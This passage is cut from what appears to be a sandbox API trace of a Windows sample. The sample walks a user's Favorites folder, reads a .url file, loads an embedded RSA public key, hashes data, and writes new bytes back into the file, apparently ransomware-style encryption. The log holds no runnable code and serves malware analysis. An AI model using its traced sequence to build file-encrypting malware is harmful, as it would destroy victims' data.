HALPmcxz\\" [0101.525] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.525] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.525] PathFindFileNameW (pszPath="") returned="" [0101.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.526] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.526] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0101.526] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned=".url" [0101.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.527] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.527] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.530] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.531] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.532] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.532] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.533] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.533] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.533] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.533] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.533] GetLastError () returned 0x0 [0101.533] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.533] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.533] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.533] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.533] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.534] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.534] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5fb0 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ff8 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.534] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8040 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8028 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.535] GetCurrentThreadId () returned 0x42c [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba80c8 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.536] GetCurrentThreadId () returned 0x42c [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8058 [0101.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5ff8 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.540] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.540] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.540] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.541] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, 